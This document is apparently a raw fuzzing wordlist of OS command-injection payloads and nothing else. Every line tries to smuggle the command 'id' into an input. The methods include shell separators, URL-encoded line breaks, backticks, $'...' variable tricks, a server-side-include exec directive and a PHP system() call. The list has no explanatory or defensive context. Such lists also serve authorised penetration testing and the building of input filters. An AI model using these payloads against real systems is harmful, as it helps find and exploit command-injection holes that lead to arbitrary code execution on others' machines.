id
;id
;id;
^id
|id
<id
<id;
<id\n
<id%0D
<id%0A
&id
&id&
&&id
&&id&&
%0Did
%0Did%0D
%0Aid
%0Aid%0A
\nid
\nid\n
'id'
`id`
;id|
;id/n
|id;
a);id
a;id
a);id
a;id;
a);id|
FAIL||id
CMD=$'id';$CMD
;CMD=$'id';$CMD
^CMD=$'id';$CMD
|CMD=$'id';$CMD
&CMD=$'id';$CMD
&&CMD=$'id';$CMD
%0DCMD=$'id';$CMD
FAIL||CMD=$'id';$CMD
CMD=$\'id\';$CMD
;CMD=$\'id\';$CMD
^CMD=$\'id\';$CMD
|CMD=$\'id\';$CMD
&CMD=$\'id\';$CMD
&&CMD=$\'id\';$CMD
%0DCMD=$\'id\';$CMD
FAIL||CMD=$\'id\';$CMD
CMD=$"id";$CMD
;CMD=$"id";$CMD
^CMD=$"id";$CMD
|CMD=$"id";$CMD
&CMD=$"id";$CMD
&&CMD=$"id";$CMD
%0DCMD=$"id";$CMD
FAIL||CMD=$"id";$CMD
<!--#exec cmd="id"-->
;system('id')
